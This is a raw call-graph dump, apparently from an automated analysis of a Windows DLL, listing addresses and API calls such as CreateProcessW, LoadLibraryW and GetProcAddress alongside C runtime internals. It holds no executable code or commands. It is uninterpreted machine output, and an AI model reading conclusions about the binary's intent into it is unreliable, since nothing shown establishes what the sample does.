16807->16809 16811 7ffa5246bd70 _invalid_parameter 17 API calls 16809->16811 16811->16802 16812 7ffa524794a6 __doserrno 16828 7ffa5247fbc0 LeaveCriticalSection 16812->16828 16815 7ffa5247fb7a 16814->16815 16816 7ffa5247fb25 16814->16816 16817 7ffa52479464 16815->16817 16818 7ffa5247fb81 EnterCriticalSection 16815->16818 16819 7ffa5247fb3b InitializeCriticalSectionAndSpinCount 16816->16819 16820 7ffa5247fb56 16816->16820 16817->16812 16822 7ffa52479520 16817->16822 16818->16817 16819->16820 16829 7ffa52469360 LeaveCriticalSection 16820->16829 16830 7ffa5247f900 16822->16830 16824 7ffa52479545 16825 7ffa5247959d SetFilePointer 16824->16825 16827 7ffa52479552 _dosmaperr 16824->16827 16826 7ffa524795c1 GetLastError 16825->16826 16825->16827 16826->16827 16827->16812 16828->16802 16829->16815 16831 7ffa5247f935 16830->16831 16833 7ffa5247f913 __doserrno 16830->16833 16832 7ffa5247f99e __doserrno 16831->16832 16835 7ffa5247f9e9 __doserrno 16831->16835 16834 7ffa5246bd70 _invalid_parameter 17 API calls 16832->16834 16833->16824 16834->16833 16835->16833 16836 7ffa5246bd70 _invalid_parameter 17 API calls 16835->16836 16836->16833 18452 180024ee6 18453 180024eea 18452->18453 18454 180024f52 18452->18454 18455 18002506a CreateProcessW 18454->18455 16837 7ffa52475b18 16840 7ffa5246cf50 16837->16840 16842 7ffa5246cf59 16840->16842 16844 7ffa524739e0 16842->16844 16845 7ffa524739fa 16844->16845 16854 7ffa5246d430 DecodePointer 16845->16854 16847 7ffa52473a09 16849 7ffa52473a20 16847->16849 16855 7ffa5246cff0 16847->16855 16850 7ffa52473a42 16849->16850 16851 7ffa5246be50 _invoke_watson_if_oneof 14 API calls 16849->16851 16867 7ffa52467090 16850->16867 16851->16850 16854->16847 16856 7ffa5246d02a 16855->16856 16857 7ffa5246d1d8 DecodePointer 16856->16857 16860 7ffa5246bd70 _invalid_parameter 17 API calls 16856->16860 16858 7ffa5246d1e8 16857->16858 16859 7ffa5246d1f0 16858->16859 16862 7ffa52467090 _exit 33 API calls 16858->16862 16863 7ffa5246d209 16858->16863 16859->16849 16861 7ffa5246d1ce 16860->16861 16861->16857 16861->16859 16862->16863 16865 7ffa5246d289 16863->16865 16870 7ffa52463d00 RtlEncodePointer 16863->16870 16865->16859 16871 7ffa52469360 LeaveCriticalSection 16865->16871 16868 7ffa52467280 _exit 33 API calls 16867->16868 16869 7ffa524670a9 16868->16869 16870->16865 16871->16859 17446 7ffa52467816 17447 7ffa52467826 _calloc_dbg 17446->17447 17449 7ffa52467a19 GetFileType 17447->17449 17450 7ffa52467a32 InitializeCriticalSectionAndSpinCount 17447->17450 17452 7ffa52467ab9 17447->17452 17448 7ffa52467ce0 SetHandleCount 17458 7ffa52467aaf 17448->17458 17449->17450 17449->17452 17450->17452 17450->17458 17451 7ffa52467c7b 17451->17448 17452->17448 17452->17451 17453 7ffa52467b95 GetStdHandle 17452->17453 17453->17451 17454 7ffa52467bb9 17453->17454 17454->17451 17455 7ffa52467bc8 GetFileType 17454->17455 17455->17451 17456 7ffa52467beb InitializeCriticalSectionAndSpinCount 17455->17456 17456->17451 17456->17458 18456 7ffa5246ae14 18457 7ffa5246b390 18456->18457 18458 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18457->18458 18459 7ffa5246b3a0 18458->18459 18460 7ffa52470215 18461 7ffa52470231 18460->18461 18465 7ffa52470302 18460->18465 18531 7ffa52478c80 18461->18531 18463 7ffa52470489 18467 7ffa52472d80 17 API calls 18463->18467 18468 7ffa5247040d 18465->18468 18538 7ffa52478c30 18465->18538 18466 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18469 7ffa5247027e OutputDebugStringW 18466->18469 18470 7ffa524704a3 18467->18470 18468->18463 18471 7ffa52471640 17 API calls 18468->18471 18472 7ffa52470296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 18469->18472 18473 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18470->18473 18476 7ffa5247045c 18471->18476 18484 7ffa524702f2 18472->18484 18474 7ffa524704d0 18473->18474 18479 7ffa5247053d 18474->18479 18480 7ffa52472d80 17 API calls 18474->18480 18486 7ffa52470583 18474->18486 18478 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18476->18478 18478->18463 18481 7ffa52472d80 17 API calls 18479->18481 18482 7ffa52470510 18480->18482 18483 7ffa52470556 18481->18483 18488 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18482->18488 18489 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18483->18489 18490 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18484->18490 18485 7ffa52470357 18487 7ffa524703af 18485->18487 18491 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 18485->18491 18541 7ffa52471590 18486->18541 18487->18468 18492 7ffa52471640 17 API calls 18487->18492 18488->18479 18489->18486 18493 7ffa52470cae 18490->18493 18491->18487 18495 7ffa524703e0 18492->18495 18496 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18495->18496 18496->18468 18497 7ffa524705fa 18498 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 18497->18498 18499 7ffa52470652 18497->18499 18498->18499 18500 7ffa52471640 17 API calls 18499->18500 18502 7ffa524706b0 18499->18502 18501 7ffa52470683 18500->18501 18503 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18501->18503 18504 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 18502->18504 18503->18502 18505 7ffa52470769 18504->18505 18506 7ffa5246d490 std::exception::_Copy_str 17 API calls 18505->18506 18518 7ffa524707bd 18505->18518 18507 7ffa52470790 18506->18507 18508 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18507->18508 18508->18518 18509 7ffa52470905 18509->18484 18510 7ffa52470a26 18509->18510 18511 7ffa524709a4 GetFileType 18509->18511 18512 7ffa52470b97 OutputDebugStringW 18510->18512 18513 7ffa52470ba5 18510->18513 18515 7ffa524709d0 18511->18515 18520 7ffa524709ce 18511->18520 18512->18513 18513->18484 18516 7ffa52470c23 18513->18516 18517 7ffa52478c80 _itow_s 17 API calls 18513->18517 18519 7ffa524709dd WriteConsoleW 18515->18519 18545 7ffa5246b470 18516->18545 18521 7ffa52470bf6 18517->18521 18518->18509 18544 7ffa52469360 LeaveCriticalSection 18518->18544 18519->18510 18522 7ffa52470a2b GetLastError 18519->18522 18523 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 18520->18523 18524 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18521->18524 18522->18510 18522->18520 18526 7ffa52470ab5 18523->18526 18524->18516 18527 7ffa52470b26 WriteFile 18526->18527 18528 7ffa52470ad0 18526->18528 18527->18510 18530 7ffa52470add WriteFile 18528->18530 18530->18510 18532 7ffa52478ca6 18531->18532 18533 7ffa52478cd3 18531->18533 18532->18533 18534 7ffa52478cad 18532->18534 18535 7ffa52478d00 _itow_s 17 API calls 18533->18535 18571 7ffa52478d00 18534->18571 18537 7ffa52470251 18535->18537 18537->18466 18587 7ffa524786b0 18538->18587 18540 7ffa52478c74 18540->18485 18542 7ffa524786b0 _snwprintf_s 17 API calls 18541->18542 18543 7ffa524715de 18542->18543 18543->18497 18544->18509 18546 7ffa5246b48d 18545->18546 18547 7ffa5246b4ce GetModuleFileNameW 18546->18547 18567 7ffa5246b4c4 18546->18567 18548 7ffa5246b4f2 18547->18548 18553 7ffa5246b538 18547->18553 18549 7ffa52471640 17 API calls 18548->18549 18552 7ffa5246b50b 18549->18552 18550 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18551 7ffa5246ba58 18550->18551 18551->18484 18554 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18552->18554 18558 7ffa5246b5f2 18553->18558 18609 7ffa52470fd0 18553->18609 18554->18553 18556 7ffa5246b5c5 18557 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18556->18557 18557->18558 18559 7ffa52471590 _snwprintf_s 17 API calls 18558->18559 18560 7ffa5246b940 18559->18560 18561 7ffa5246b998 18560->18561 18562 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 18560->18562 18563 7ffa52471640 17 API calls 18561->18563 18566 7ffa5246b9f6 18561->18566 18562->18561 18564 7ffa5246b9c9 18563->18564 18565 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18564->18565 18565->18566 18566->18567 18568 7ffa5246cff0 terminate 34 API calls 18566->18568 18567->18550 18569 7ffa5246ba2b 18568->18569 18570 7ffa52467090 _exit 33 API calls 18569->18570 18570->18567 18572 7ffa52478d25 18571->18572 18573 7ffa52478d7b 18572->18573 18576 7ffa52478db9 18572->18576 18574 7ffa5246bd70 _invalid_parameter 17 API calls 18573->18574 18584 7ffa52478daf 18574->18584 18575 7ffa52478e1a 18577 7ffa5246bd70 _invalid_parameter 17 API calls 18575->18577 18576->18575 18578 7ffa52478e58 _calloc_dbg_impl 18576->18578 18577->18584 18579 7ffa52478f5d 18578->18579 18582 7ffa52478f9b 18578->18582 18580 7ffa5246bd70 _invalid_parameter 17 API calls 18579->18580 18580->18584 18581 7ffa5247900e 18583 7ffa5246bd70 _invalid_parameter 17 API calls 18581->18583 18582->18581 18585 7ffa5247904c 18582->18585 18583->18584 18584->18537 18585->18584 18586 7ffa5246bd70 _invalid_parameter 17 API calls 18585->18586 18586->18584 18588 7ffa524786e6 18587->18588 18589 7ffa5247873c 18588->18589 18590 7ffa5247877a 18588->18590 18591 7ffa5246bd70 _invalid_parameter 17 API calls 18589->18591 18592 7ffa5247880e 18590->18592 18593 7ffa5247884c 18590->18593 18599 7ffa52478770 _calloc_dbg_impl 18590->18599 18591->18599 18596 7ffa5246bd70 _invalid_parameter 17 API calls 18592->18596 18594 7ffa52478992 18593->18594 18595 7ffa52478862 18593->18595 18598 7ffa52478350 _snwprintf_s 17 API calls 18594->18598 18602 7ffa52478350 18595->18602 18596->18599 18600 7ffa524788b1 _calloc_dbg_impl 18598->18600 18599->18540 18600->18599 18601 7ffa5246bd70 _invalid_parameter 17 API calls 18600->18601 18601->18599 18603 7ffa5247839b 18602->18603 18604 7ffa524783f1 18603->18604 18606 7ffa5247842f 18603->18606 18605 7ffa5246bd70 _invalid_parameter 17 API calls 18604->18605 18608 7ffa52478425 18605->18608 18607 7ffa5246bd70 _invalid_parameter 17 API calls 18606->18607 18606->18608 18607->18608 18608->18600 18611 7ffa52470ff7 18609->18611 18612 7ffa52470ff0 __SehTransFilter 18609->18612 18610 7ffa52471055 18613 7ffa5246bd70 _invalid_parameter 17 API calls 18610->18613 18611->18610 18615 7ffa52471093 _calloc_dbg_impl 18611->18615 18612->18556 18613->18612 18614 7ffa5247111a 18616 7ffa5246bd70 _invalid_parameter 17 API calls 18614->18616 18615->18612 18615->18614 18617 7ffa52471158 18615->18617 18616->18612 18617->18612 18618 7ffa5246bd70 _invalid_parameter 17 API calls 18617->18618 18618->18612 18619 7ffa52481200 18620 7ffa5246ed30 _FindAndUnlinkFrame 36 API calls 18619->18620 18621 7ffa52481212 _IsExceptionObjectToBeDestroyed __SehTransFilter 18620->18621 16501 1800178f4 16504 18000ffc0 16501->16504 16503 180017924 16508 18001000e 16504->16508 16505 180011bd0 16516 1800053b0 16505->16516 16508->16505 16509 1800116b2 16508->16509 16510 18001667c 16508->16510 16509->16503 16511 1800166ac 16510->16511 16514 180016ad3 16511->16514 16520 180023624 16511->16520 16524 18000bc98 16511->16524 16528 1800270c0 16511->16528 16514->16508 16519 1800053e0 16516->16519 16517 18001a10c CreateProcessW 16518 18000598b 16517->16518 16518->16509 16519->16517 16519->16518 16523 180023662 16520->16523 16522 1800237ae 16522->16511 16523->16522 16532 18001a10c 16523->16532 16527 18000bcde 16524->16527 16525 18001a10c CreateProcessW 16526 18000c521 16525->16526 16526->16511 16527->16525 16527->16526 16531 180027157 16528->16531 16529 180027fe1 16529->16511 16530 18001a10c CreateProcessW 16530->16531 16531->16529 16531->16530 16533 18001a166 16532->16533 16534 180024f28 CreateProcessW 16533->16534 16535 18001a335 16534->16535 16535->16522 17464 7ffa524653fb 17465 7ffa5246541d _realloc_dbg 17464->17465 17466 7ffa52466380 _CrtIsValidHeapPointer HeapValidate 17465->17466 17467 7ffa52465421 17465->17467 17468 7ffa524654de _calloc_dbg_impl _realloc_dbg 17466->17468 17470 7ffa5246c020 17468->17470 17471 7ffa5246c03b HeapFree 17470->17471 17472 7ffa5246c039 _get_errno_from_oserr 17470->17472 17471->17472 17473 7ffa5246c05a GetLastError 17471->17473 17472->17467 17473->17472 16887 7ffa5247e2fc 16888 7ffa5247e309 get_int64_arg _get_printf_count_output 16887->16888 16889 7ffa5247e38c 16888->16889 16890 7ffa5247e3e1 16888->16890 16893 7ffa5246bd70 _invalid_parameter 17 API calls 16889->16893 16891 7ffa5247eadf 16890->16891 16892 7ffa5247eec0 25 API calls 16890->16892 16899 7ffa5247da75 16890->16899 16894 7ffa5247ef10 25 API calls 16891->16894 16892->16891 16896 7ffa5247dbe9 _LocaleUpdate::~_LocaleUpdate 16893->16896 16895 7ffa5247eafd 16894->16895 16897 7ffa5247eb33 16895->16897 16900 7ffa5247eec0 25 API calls 16895->16900 16902 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16896->16902 16898 7ffa5247ec29 16897->16898 16911 7ffa5247eb49 _CrtMemDumpAllObjectsSince 16897->16911 16901 7ffa5247ef10 25 API calls 16898->16901 16904 7ffa5247ebda 16898->16904 16903 7ffa5247eca1 16899->16903 16908 7ffa5247dbb5 16899->16908 16900->16897 16901->16904 16905 7ffa5247ed9e 16902->16905 16903->16896 16907 7ffa5246bd70 _invalid_parameter 17 API calls 16903->16907 16904->16899 16906 7ffa5247eec0 25 API calls 16904->16906 16906->16899 16907->16896 16909 7ffa5246bd70 _invalid_parameter 17 API calls 16908->16909 16909->16896 16910 7ffa5247f000 wcsxfrm 2 API calls 16910->16911 16911->16904 16911->16910 16912 7ffa5247ee40 25 API calls 16911->16912 16912->16911 17474 7ffa52463409 17475 7ffa52463e00 3 API calls 17474->17475 17476 7ffa5246340e 17475->17476 17479 7ffa524688d0 HeapDestroy 17476->17479 17478 7ffa52463413 17479->17478 18129 7ffa52463909 18130 7ffa52463913 __SehTransFilter 18129->18130 18131 7ffa52463a71 RtlUnwindEx 18130->18131 18132 7ffa524639db __SehTransFilter 18130->18132 18131->18132 18627 7ffa52480204 18631 7ffa5248023d 18627->18631 18628 7ffa5248028d 18629 7ffa52480326 18629->18628 18632 7ffa52479290 23 API calls 18629->18632 18630 7ffa5247ab10 17 API calls 18630->18629 18631->18628 18631->18629 18631->18630 18632->18628 18633 7ffa52476203 18634 7ffa5247616e _CrtMemDumpAllObjectsSince wcsxfrm 18633->18634 18635 7ffa52476238 MultiByteToWideChar 18634->18635 18636 7ffa524761c8 _LocaleUpdate::~_LocaleUpdate 18634->18636 18635->18636 17480 7ffa5246e830 17481 7ffa5246e857 17480->17481 17484 7ffa52473cc0 17481->17484 17485 7ffa52473cdd 17484->17485 17487 7ffa52473d82 17485->17487 17491 7ffa52473ef3 __SehTransFilter 17485->17491 17501 7ffa5246e8e3 17485->17501 17486 7ffa52473e40 17490 7ffa52473ec7 17486->17490 17494 7ffa52473e62 17486->17494 17487->17486 17489 7ffa52473dc8 17487->17489 17487->17501 17503 7ffa52473a60 17489->17503 17516 7ffa5246e790 17490->17516 17491->17501 17523 7ffa524740b0 17491->17523 17496 7ffa5246cf80 _inconsistency 36 API calls 17494->17496 17497 7ffa52473e93 17494->17497 17496->17497 17500 7ffa52474f20 __SehTransFilter 36 API calls 17497->17500 17498 7ffa52473e08 17509 7ffa52474f20 17498->17509 17499 7ffa5246cf80 _inconsistency 36 API calls 17499->17498 17500->17501 17504 7ffa52473a7d 17503->17504 17505 7ffa52473a7b 17503->17505 17506 7ffa5246cf80 _inconsistency 36 API calls 17504->17506 17507 7ffa5246cf80 _inconsistency 36 API calls 17505->17507 17508 7ffa52473aa5 17505->17508 17506->17505 17507->17508 17508->17498 17508->17499 17568 7ffa52473b70 17509->17568 17511 7ffa5246cf80 _inconsistency 36 API calls 17515 7ffa52474f55 __SehTransFilter _SetImageBase __SetState 17511->17515 17512 7ffa52475103 17513 7ffa5247514a __SetState 17512->17513 17514 7ffa5246cf80 _inconsistency 36 API calls 17512->17514 17513->17501 17514->17513 17515->17511 17515->17512 17575 7ffa5246e500 17516->17575 17519 7ffa52473b40 __StateFromControlPc 36 API calls 17520 7ffa5246e7d0 __SehTransFilter 17519->17520 17521 7ffa52474f20 __SehTransFilter 36 API calls 17520->17521 17522 7ffa5246e81e 17521->17522 17522->17501 17524 7ffa52473b40 __StateFromControlPc 36 API calls 17523->17524 17525 7ffa524740ea 17524->17525 17526 7ffa5246e500 __GetUnwindTryBlock 37 API calls 17525->17526 17527 7ffa52474110 17526->17527 17580 7ffa52473c70 17527->17580 17530 7ffa52474176 17532 7ffa52473c70 __GetUnwindTryBlock 37 API calls 17530->17532 17531 7ffa52474133 __SetState 17583 7ffa52473c00 17531->17583 17533 7ffa52474174 17532->17533 17535 7ffa5246cf80 _inconsistency 36 API calls 17533->17535 17549 7ffa524741af _ValidateRead _SetThrowImageBase 17533->17549 17535->17549 17536 7ffa524747d9 17537 7ffa52474847 17536->17537 17538 7ffa524747f3 17536->17538 17543 7ffa524747d7 17536->17543 17542 7ffa5246cf50 terminate 35 API calls 17537->17542 17613 7ffa52474960 17538->17613 17539 7ffa52474347 17539->17536 17540 7ffa524743f5 17539->17540 17547 7ffa5247466c __SehTransFilter 17540->17547 17598 7ffa5246ea30 17540->17598 17542->17543 17544 7ffa52474235 17543->17544 17546 7ffa5246cf80 _inconsistency 36 API calls 17543->17546 17544->17501 17546->17544 17547->17543 17548 7ffa52475bb0 __SehTransFilter 36 API calls 17547->17548 17550 7ffa52474727 17548->17550 17549->17539 17549->17544 17552 7ffa5246cf80 _inconsistency 36 API calls 17549->17552 17555 7ffa5247428e 17549->17555 17550->17543 17551 7ffa5246e500 __GetUnwindTryBlock 37 API calls 17550->17551 17553 7ffa52474767 17551->17553 17552->17555 17610 7ffa5246edc0 RtlUnwindEx 17553->17610 17556 7ffa5246cf80 _inconsistency 36 API calls 17555->17556 17557 7ffa524742fa 17555->17557 17556->17557 17557->17539 17586 7ffa52475bb0 17557->17586 17558 7ffa52474450 __SehTransFilter 17558->17547 17603 7ffa52475180 17558->17603 17561 7ffa52474340 __SehTransFilter 17561->17539 17562 7ffa5247435a __SehTransFilter 17561->17562 17563 7ffa52474393 17561->17563 17592 7ffa52474870 17562->17592 17564 7ffa5246cf50 terminate 35 API calls 17563->17564 17564->17539 17569 7ffa52473ba9 17568->17569 17570 7ffa52473b9a 17568->17570 17569->17515 17572 7ffa52473b40 17570->17572 17573 7ffa52473a60 __StateFromControlPc 36 API calls 17572->17573 17574 7ffa52473b65 17573->17574 17574->17569 17576 7ffa52473b40 __StateFromControlPc 36 API calls 17575->17576 17577 7ffa5246e539 17576->17577 17578 7ffa5246e5c2 RtlLookupFunctionEntry 17577->17578 17579 7ffa5246e601 17577->17579 17578->17579 17579->17519 17581 7ffa5246e500 __GetUnwindTryBlock 37 API calls 17580->17581 17582 7ffa52473c9c 17581->17582 17582->17530 17582->17531 17584 7ffa5246e500 __GetUnwindTryBlock 37 API calls 17583->17584 17585 7ffa52473c31 17584->17585 17585->17533 17587 7ffa52475bc8 17586->17587 17588 7ffa52475bc6 17586->17588 17589 7ffa5246cf80 _inconsistency 36 API calls 17587->17589 17590 7ffa5246cf50 terminate 35 API calls 17588->17590 17591 7ffa52475bda __SehTransFilter 17588->17591 17589->17588 17590->17591 17591->17561 17623 7ffa5247d4e0 17592->17623 17595 7ffa5247d320 17597 7ffa5247d375 17595->17597 17596 7ffa5247d3ba RaiseException 17596->17539 17597->17596 17599 7ffa52473b40 __StateFromControlPc 36 API calls 17598->17599 17600 7ffa5246ea6f 17599->17600 17601 7ffa5246cf80 _inconsistency 36 API calls 17600->17601 17602 7ffa5246ea7a 17600->17602 17601->17602 17602->17558 17604 7ffa5246e500 __GetUnwindTryBlock 37 API calls 17603->17604 17605 7ffa524751c1 17604->17605 17606 7ffa524751f0 __SehTransFilter 17605->17606 17630 7ffa52475970 17605->17630 17608 7ffa5246edc0 __SehTransFilter 9 API calls 17606->17608 17609 7ffa52475259 17608->17609 17609->17558 17611 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17610->17611 17612 7ffa5246eee7 17611->17612 17612->17543 17615 7ffa52474990 17613->17615 17620 7ffa5247498b 17613->17620 17614 7ffa524749b2 __SehTransFilter 17616 7ffa52474a41 17614->17616 17617 7ffa5246cf80 _inconsistency 36 API calls 17614->17617 17614->17620 17615->17614 17647 7ffa52463d00 RtlEncodePointer 17615->17647 17619 7ffa5246ea30 __SehTransFilter 36 API calls 17616->17619 17617->17616 17621 7ffa52474a8e __SehTransFilter 17619->17621 17620->17543 17621->17620 17622 7ffa52475180 __SehTransFilter 38 API calls 17621->17622 17622->17620 17626 7ffa5247d660 17623->17626 17627 7ffa5247d676 std::exception::_Copy_str malloc 17626->17627 17629 7ffa5247437d 17626->17629 17628 7ffa5246d490 std::exception::_Copy_str 17 API calls 17627->17628 17627->17629 17628->17629 17629->17595 17631 7ffa52475998 17630->17631 17634 7ffa524755f0 17631->17634 17633 7ffa524759d3 __SehTransFilter __AdjustPointer 17633->17606 17635 7ffa5247561e __SehTransFilter 17634->17635 17636 7ffa52475765 17635->17636 17637 7ffa524756fa _ValidateRead 17635->17637 17643 7ffa524756aa __SehTransFilter __AdjustPointer 17635->17643 17638 7ffa5247577a _ValidateRead 17636->17638 17639 7ffa52475813 __SehTransFilter 17636->17639 17641 7ffa5246cf80 _inconsistency 36 API calls 17637->17641 17637->17643 17642 7ffa5246cf80 _inconsistency 36 API calls 17638->17642 17638->17643 17640 7ffa524758c6 __SehTransFilter _ValidateExecute _ValidateRead 17639->17640 17644 7ffa5247584d _ValidateRead 17639->17644 17640->17643 17646 7ffa5246cf80 _inconsistency 36 API calls 17640->17646 17641->17643 17642->17643 17643->17633 17644->17643 17645 7ffa5246cf80 _inconsistency 36 API calls 17644->17645 17645->17643 17646->17643 17647->17614 17648 7ffa5247d830 17649 7ffa5247d8aa 17648->17649 17650 7ffa5247d926 17649->17650 17653 7ffa5247d97b 17649->17653 17651 7ffa5246bd70 _invalid_parameter 17 API calls 17650->17651 17656 7ffa5247d95a _LocaleUpdate::~_LocaleUpdate 17651->17656 17652 7ffa5247d9ee 17654 7ffa5246bd70 _invalid_parameter 17 API calls 17652->17654 17653->17652 17659 7ffa5247da43 17653->17659 17654->17656 17655 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17657 7ffa5247ed9e 17655->17657 17656->17655 17658 7ffa5247eca1 17658->17656 17660 7ffa5246bd70 _invalid_parameter 17 API calls 17658->17660 17659->17658 17661 7ffa5247dbb5 17659->17661 17660->17656 17662 7ffa5246bd70 _invalid_parameter 17 API calls 17661->17662 17662->17656 16422 7ffa52463d30 16440 7ffa52467540 16422->16440 16427 7ffa52463d4e FlsAlloc 16430 7ffa52463d6a 16427->16430 16431 7ffa52463d73 _calloc_dbg 16427->16431 16428 7ffa52463d42 16429 7ffa52463e00 3 API calls 16428->16429 16432 7ffa52463d47 16429->16432 16433 7ffa52463e00 3 API calls 16430->16433 16434 7ffa52463db9 16431->16434 16435 7ffa52463da4 FlsSetValue 16431->16435 16433->16432 16437 7ffa52463e00 3 API calls 16434->16437 16435->16434 16436 7ffa52463dc2 16435->16436 16449 7ffa52463e30 16436->16449 16437->16432 16455 7ffa52463d00 RtlEncodePointer 16440->16455 16442 7ffa52467549 _initp_misc_winsig 16456 7ffa5246cf20 EncodePointer 16442->16456 16444 7ffa52463d39 16445 7ffa52468fe0 16444->16445 16446 7ffa52468ff6 16445->16446 16447 7ffa52463d3e 16446->16447 16448 7ffa52469022 InitializeCriticalSectionAndSpinCount 16446->16448 16447->16427 16447->16428 16448->16446 16448->16447 16450 7ffa52463ead 16449->16450 16457 7ffa52469360 LeaveCriticalSection 16450->16457 16452 7ffa52463ec7 _updatetlocinfoEx_nolock 16458 7ffa52469360 LeaveCriticalSection 16452->16458 16454 7ffa52463dce GetCurrentThreadId 16454->16432 16455->16442 16456->16444 16457->16452 16458->16454 18142 7ffa52463130 18145 7ffa52463170 18142->18145 18146 7ffa524631ac 18145->18146 18147 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18146->18147 18148 7ffa52463160 18147->18148 16917 7ffa5247ff2d 16918 7ffa5247ff37 16917->16918 16919 7ffa5247ff47 16918->16919 16920 7ffa52480042 16918->16920 16921 7ffa5248003d 16919->16921 16932 7ffa5247ae90 16919->16932 16950 7ffa52469360 LeaveCriticalSection 16920->16950 16923 7ffa5248004c 16925 7ffa5247ff97 16927 7ffa5247ffe1 16925->16927 16928 7ffa5247ffbb 16925->16928 16931 7ffa5247ffd0 16925->16931 16930 7ffa5247fd70 _fflush_nolock 25 API calls 16927->16930 16927->16931 16935 7ffa5247fd70 16928->16935 16930->16931 16945 7ffa5247af60 16931->16945 16933 7ffa5247aec8 EnterCriticalSection 16932->16933 16934 7ffa5247aea4 16932->16934 16933->16934 16934->16925 16936 7ffa5247fd81 16935->16936 16937 7ffa5247fd8a 16935->16937 16951 7ffa5247ff00 16936->16951 16966 7ffa5247fdf0 16937->16966 16940 7ffa5247fd94 16941 7ffa5247afb0 _fflush_nolock 17 API calls 16940->16941 16944 7ffa5247fd88 16940->16944 16942 7ffa5247fdba 16941->16942 16970 7ffa524807c0 16942->16970 16944->16931 16946 7ffa5247af98 LeaveCriticalSection 16945->16946 16947 7ffa5247af74 16945->16947 16949 7ffa5247af96 16946->16949 16988 7ffa52469360 LeaveCriticalSection 16947->16988 16949->16921 16950->16923 16952 7ffa5247ff22 16951->16952 16953 7ffa52480042 16952->16953 16956 7ffa5247ff47 16952->16956 16986 7ffa52469360 LeaveCriticalSection 16953->16986 16954 7ffa5248003d 16954->16944 16956->16954 16958 7ffa5247ae90 _lock_file2 EnterCriticalSection 16956->16958 16957 7ffa5248004c 16957->16944 16959 7ffa5247ff97 16958->16959 16960 7ffa5247ffd0 16959->16960 16962 7ffa5247ffe1 16959->16962 16963 7ffa5247ffbb 16959->16963 16961 7ffa5247af60 _unlock_file2 2 API calls 16960->16961 16961->16954 16962->16960 16965 7ffa5247fd70 _fflush_nolock 25 API calls 16962->16965 16964 7ffa5247fd70 _fflush_nolock 25 API calls 16963->16964 16964->16960 16965->16960 16967 7ffa5247fe1f 16966->16967 16969 7ffa5247fe5d 16966->16969 16968 7ffa5247afb0 _fflush_nolock 17 API calls 16967->16968 16967->16969 16968->16969 16969->16940 16971 7ffa524807d3 16970->16971 16973 7ffa524807e8 16970->16973 16971->16944 16972 7ffa52480851 16974 7ffa5246bd70 _invalid_parameter 17 API calls 16972->16974 16973->16972 16978 7ffa5248088f 16973->16978 16974->16971 16975 7ffa52480951 16977 7ffa5247fae0 _fflush_nolock 3 API calls 16975->16977 16976 7ffa52480913 16980 7ffa5246bd70 _invalid_parameter 17 API calls 16976->16980 16979 7ffa5248095a 16977->16979 16978->16975 16978->16976 16981 7ffa5247f900 _fflush_nolock 17 API calls 16979->16981 16985 7ffa524809ab __doserrno 16979->16985 16980->16971 16982 7ffa52480992 FlushFileBuffers 16981->16982 16983 7ffa5248099f GetLastError 16982->16983 16982->16985 16983->16985 16987 7ffa5247fbc0 LeaveCriticalSection 16985->16987 16986->16957 16987->16971 16988->16949 18149 7ffa5246b12b 18150 7ffa5246b14c 18149->18150 18151 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 18150->18151 18153 7ffa5246b2e0 18150->18153 18151->18153 18152 7ffa5246b33e 18165 7ffa52470cc0 18152->18165 18153->18152 18155 7ffa5246d490 std::exception::_Copy_str 17 API calls 18153->18155 18156 7ffa5246b311 18155->18156 18158 7ffa52467ff0 _invoke_watson_if_error 16 API calls 18156->18158 18158->18152 18159 7ffa5246b37d 18163 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18159->18163 18160 7ffa5246cff0 terminate 34 API calls 18161 7ffa5246b373 18160->18161 18162 7ffa52467090 _exit 33 API calls 18161->18162 18162->18159 18164 7ffa5246b3a0 18163->18164 18183 7ffa52463d00 RtlEncodePointer 18165->18183 18167 7ffa52470cf6 18168 7ffa52470e15 18167->18168 18169 7ffa52470d23 LoadLibraryW 18167->18169 18172 7ffa52470e39 DecodePointer DecodePointer 18168->18172 18182 7ffa52470e68 18168->18182 18170 7ffa52470d44 GetProcAddress 18169->18170 18179 7ffa52470d3d 18169->18179 18171 7ffa52470d6a 7 API calls 18170->18171 18170->18179 18171->18168 18175 7ffa52470df3 GetProcAddress EncodePointer 18171->18175 18172->18182 18173 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18178 7ffa5246b358 18173->18178 18174 7ffa52470f60 DecodePointer 18174->18179 18175->18168 18176 7ffa52470eed DecodePointer 18177 7ffa52470f0d 18176->18177 18177->18174 18180 7ffa52470f2f DecodePointer 18177->18180 18178->18159 18178->18160 18179->18173 18180->18174 18181 7ffa52470ec8 18180->18181 18181->18174 18182->18176 18182->18177 18182->18181 18183->18167 18184 7ffa52479939 18185 7ffa52479951 __doserrno 18184->18185 18186 7ffa5246bd70 _invalid_parameter 17 API calls 18185->18186 18187 7ffa524799d7 18186->18187 18188 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18187->18188 18189 7ffa5247a9f5 18188->18189 16465 18001a10c 16466 18001a166 16465->16466 16469 180024f28 16466->16469 16468 18001a335 16470 180024fcb 16469->16470 16471 18002506a CreateProcessW 